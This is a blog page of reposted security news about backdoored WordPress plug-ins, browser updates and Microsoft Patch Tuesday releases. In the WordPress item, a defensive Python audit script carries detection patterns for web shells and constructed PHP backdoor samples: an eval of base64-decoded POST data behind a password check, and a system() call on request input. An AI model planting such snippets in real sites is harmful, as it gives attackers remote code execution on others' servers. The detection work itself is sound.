Posts tagged as: patch

Wordpress Security

Attackers added a back door to three plug-ins that were available for download from WordPress for more than 24 hours.

WordPress on Tuesday warned all users who run its software on their own servers to beware a trio of malicious plug-ins for its content management software, which may have been available for download from the site for more than 24 hours.

“Earlier today the WordPress team noticed suspicious commits to several popular plugins–AddThis, WPtouch, and W3 Total Cache–containing cleverly disguised backdoors. We determined the commits were not from the authors, rolled them back, pushed updates to the plugins, and shut down access to the plugin repository while we looked for anything else unsavory,” said a warning from Matt Mullenweg, founding developer of WordPress, released on Tuesday.

Plug-ins extend WordPress functionality, and the ones called out in the security warning offer an interface with social networking sites (AddThis), mobile and iPad versions of WordPress blogs (WPtouch), and server performance enhancements (W3 Total Cache). AddThis and W3 Total Cache have been downloaded at least 500,000 times, and the free version of WPtouch, more than two million times.

Mullenweg said that while an investigation is under way and there is no evidence that attackers compromised the WordPress site, WordPress has, as a precaution, forcibly reset all passwords for WordPress.org, the site from which users download WordPress. “To use the forums, [development site] Trac, or commit to a plugin or theme, you’ll need to reset your password to a new one”–by using the log-in page–said Mullenweg.

In addition, he said that any users of the three Trojanized plug-ins who updated them “in the past day” (meaning Monday or Tuesday) should upgrade those plug-ins immediately.

Plug-ins, malicious or otherwise, continue to account for an increasing number of vulnerabilities seen in applications, both on PCs (for example, with browsers) and in Web applications (such as WordPress). In terms of WordPress, plug-ins now account for 80% of all WordPress-related vulnerabilities, according to HP DVLabs.

But some plug-in vulnerabilities are worse than others. “Web-based backdoors can be extremely dangerous,” said Paul Ducklin, head of technology for Sophos in the Asia Pacific region, in a blog post. “If you’re a WordPress user, you’ll know that the WordPress platform includes a complete and powerful administration interface, password-protected, via a URL such as “site.example/wp-admin.” A WordPress backdoor might offer something with similar functionality, but using a different, unexpected, URL, and using a password known to the hacker, instead of to you.”

Another danger is that if attackers managed to steal WordPress passwords, they might attempt to use them to access other sites. According to Mullenweg, “as a user, make sure to never use the same password for two different services, and we encourage you not to reset your password to be the same as your old one.”

Unfortunately, password reuse remains rampant as numerous, recent attacks have shown, such as when LulzSec released stolen databases containing usernames and passwords–such as the release of 37,608 SonyPictures.com passwords, which researchers have cross-referenced with other leaked databases.
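Two checks follow from the incident described above: anyone who pulled one of the three plug-ins “in the past day” needs to know whether the installed files match a clean copy, and Ducklin’s point is that a backdoor looks like an admin interface hidden behind an unexpected URL and a password only the attacker knows. The script below is an added example, not code from WordPress.org, Sophos or the InformationWeek article, and it does not reproduce the code actually injected into AddThis, WPtouch or W3 Total Cache. It compares installed plug-in files against a trusted hash manifest and then greps the files that fail that check for the generic web-shell patterns such a hidden interface needs. The plug-in sources, the dropped `.cache.php` helper and the manifest are constructed for illustration; in practice the manifest would be built from a clean copy of the plug-in’s released version.

```python
"""Triage for a possibly backdoored WordPress plug-in (added example).

Two checks a site owner can run after an incident like the one above:
  1. diff the installed files against a trusted hash manifest, which catches
     a disguised change even when it reads like legitimate code;
  2. grep the sources for the classic web-shell patterns that an admin
     interface "at an unexpected URL" would need.
Plug-in sources and the manifest below are constructed for illustration.
"""
import hashlib
import re

# --- 1. integrity check against a trusted manifest ------------------------

def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def changed_files(installed: dict, manifest: dict) -> list:
    """Names of installed files that are missing from, or differ from, the manifest."""
    return sorted(
        name for name, src in installed.items() if manifest.get(name) != sha256_hex(src)
    )

# --- 2. heuristic source scan (triage leads, not proof) ---------------------

INDICATORS = [
    # eval/assert fed by a decoder: eval(base64_decode(...)), eval(gzinflate(...)) ...
    ("obfuscated eval", re.compile(
        r"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
        re.IGNORECASE)),
    # request data passed straight to a code or command sink
    ("request data reaches exec sink", re.compile(
        r"\b(?:eval|assert|system|exec|passthru|shell_exec|popen|proc_open)\s*\(\s*"
        r"(?:stripslashes\s*\(\s*)?\$_(?:GET|POST|REQUEST|COOKIE)\b",
        re.IGNORECASE)),
    # preg_replace with the /e modifier evaluates the replacement as PHP
    ("preg_replace /e modifier", re.compile(
        r"preg_replace\s*\(\s*(['\"])/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*\1")),
    # a request parameter compared with a literal: the password only the attacker knows
    ("hard-coded credential check", re.compile(
        r"(?:(?:md5|sha1)\s*\(\s*)?\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\)?"
        r"\s*[!=]==?\s*['\"][^'\"]{4,}['\"]")),
]

def scan_source(name: str, source: str) -> list:
    """Return (file, indicator, line_no, line) for each indicator hit."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((name, label, line_no, line.strip()))
    return hits

def audit(installed: dict, manifest: dict) -> dict:
    """Run both checks; only files that fail the integrity check are scanned."""
    suspects = changed_files(installed, manifest)
    hits = [h for name in suspects for h in scan_source(name, installed[name])]
    return {"changed": suspects, "hits": hits}

# --- constructed samples (hypothetical plug-in, not a real one) -------------

CLEAN_PLUGIN = """<?php
/* Plugin Name: Example Widget (constructed sample, not a real plug-in) */
add_action('wp_head', 'example_widget_head');
function example_widget_head() {
    echo '<!-- example widget -->';
}
"""

# The original code is left intact; the backdoor is appended behind a
# harmless-looking "cache key" parameter whose value only the attacker knows.
TROJANED_PLUGIN = CLEAN_PLUGIN + """
if (isset($_GET['wp_cache_key']) && md5($_GET['wp_cache_key']) == '5f4dcc3b5aa765d61d8327deb882cf99') {
    eval(base64_decode($_POST['payload']));
}
"""

# A dropped helper file that is a plain web shell.
DROPPED_SHELL = """<?php
/* looks like a cache helper (constructed sample) */
if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }
preg_replace('/.*/e', $_POST['code'], '');
"""

# Manifest built from a clean copy of the released version (here: the clean sample).
TRUSTED_MANIFEST = {"example-widget/example-widget.php": sha256_hex(CLEAN_PLUGIN)}
INSTALLED = {
    "example-widget/example-widget.php": TROJANED_PLUGIN,
    "example-widget/inc/.cache.php": DROPPED_SHELL,
}

if __name__ == "__main__":
    report = audit(INSTALLED, TRUSTED_MANIFEST)
    for name in report["changed"]:
        print("modified or unlisted:", name)
    for name, label, line_no, line in report["hits"]:
        print(f"{name}:{line_no}: {label}: {line}")
```

The hash comparison is the stronger of the two checks: a commit that was “cleverly disguised” is by definition written to pass a casual read, so the regexes will miss a careful backdoor and will also flag legitimate code (minified libraries often carry `base64_decode`). Treat pattern hits as leads to read by hand, and treat any file that differs from a known-good release, or that the release does not list at all, as the finding that matters.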

http://www.informationweek.com/news/security/vulnerabilities/231000230


Google and Mozilla Fix Browser Flaws

Google and Mozilla have released new versions of their browsers, plugging plenty of security holes along the way.

Hundreds of bugs have been fixed in the Google Chrome update, after the company said it would be releasing a “new stable version” of the browser every six weeks.

So far Google has followed through with its promise and introduced the patches along with a new HTML5 parser and file API, among other features.

“Also, if you choose to block sites from setting any data in your browser’s content settings for cookies, you can now use a new dialog for managing blocked cookies in bulk,” noted Jeff Chang, product manager for Google Chrome, in a blog.

Google recently launched a security advice page offering some tips on how users can protect themselves from hackers.

Mozilla, meanwhile, has made Firefox versions 3.6.11 and 3.5.14 available for download, patching nine vulnerabilities along the way.

Five of the flaws were ranked as critical, meaning they could be exploited “to run attacker code and install software, requiring no user interaction beyond normal browsing,” Mozilla explained.

“As always, we recommend that users keep up to date with the latest stability and support versions of Firefox, and encourage all our users to upgrade to the very latest version, Firefox 3.6.11,” advised Firefox release manager Christian Legnitto.


from » http://www.itpro.co.uk

Need help with virus and malware removal? Have questions about computer cleanup and system optimization? You can contact me here.


Microsoft plans biggest Patch Tuesday ever

Microsoft is due to issue its biggest ever Patch Tuesday, with 16 bulletins set to be released.

Microsoft has planned its biggest ever Patch Tuesday for October, with a total of 49 vulnerabilities set to be fixed. This is over three times the number of security holes fixed in last month’s Patch Tuesday.

Of the 16 bulletins, four have been rated critical, meaning the flaws could lead to remote code execution. All four affect every version of Windows.

One of the critical vulnerabilities affects Internet Explorer versions 6, 7 and 8, while two of the flaws classed as “important” affect Microsoft Office: one in Word and one in Excel, on all platforms.

This Patch Tuesday announcement also marked the first time Microsoft Word 2010 had been included in an advisory.

The vulnerabilities are due to be patched on 12 October.


Microsoft Addressing 34 Vulnerabilities

Next week’s Patch Tuesday will see 10 bulletins from Microsoft addressing 34 vulnerabilities.

Microsoft is set to tackle a huge number of vulnerabilities on next week’s Patch Tuesday.

The company revealed today it would address 34 security flaws through 10 separate bulletins, three of which are marked “critical.” The other seven are flagged up as “important.”

The critical vulnerabilities are known to affect all versions of Windows, as well as Internet Explorer, while the latter seven cover Windows and Office.

Although Microsoft has warned on its Security Response Centre blog that administrators need to be prepared as always for the patches, the wider security industry is warning users to be extra vigilant.

“The June release is a large update and will keep system administrators busy, even if they have migrated to Windows 7 already,” said Wolfgang Kandek, chief technology officer at Qualys, in a statement.

Alan Bentley, vice president of international at Lumension, added in a statement: “The impact will be felt enterprise-wide with bulletins covering a large portion of Microsoft’s range of operating systems and Windows and Office products.”

“It is strongly suggested that IT administrators plan ahead and prioritise this patch load as soon as possible.”

Last month’s Patch Tuesday only saw two bulletins released, but both were critical updates.


from » http://www.itpro.co.uk


Microsoft to Release Two Critical Patches

Critical Updates

Microsoft has confirmed two critical bulletins for next week’s patch Tuesday.

Next week’s patch Tuesday will see Microsoft releasing two critical updates to its users.

The flaws are marked as critical for Windows 2000, XP, Vista, Server 2003 and Server 2008 users whilst Windows 7 and Server 2008 R2 users are advised it is “important” to download, although they are not vulnerable.

The two bulletins – one for Word and one for Windows – are due on 9 May. However, the recently discovered flaw affecting all versions of its Internet Explorer browser, which leaves SharePoint vulnerable, will remain unpatched.

“Our teams are still working on an update for that issue,” claimed Jerry Bryant, group manager of Response Communications at Microsoft, in a blog post.

“In the meantime, we recommend customers review the advisory and apply the workarounds.”

This month’s patch Tuesday is much smaller than the one in April which saw Microsoft fix 25 flaws across 11 patches.


from » http://www.itpro.co.uk
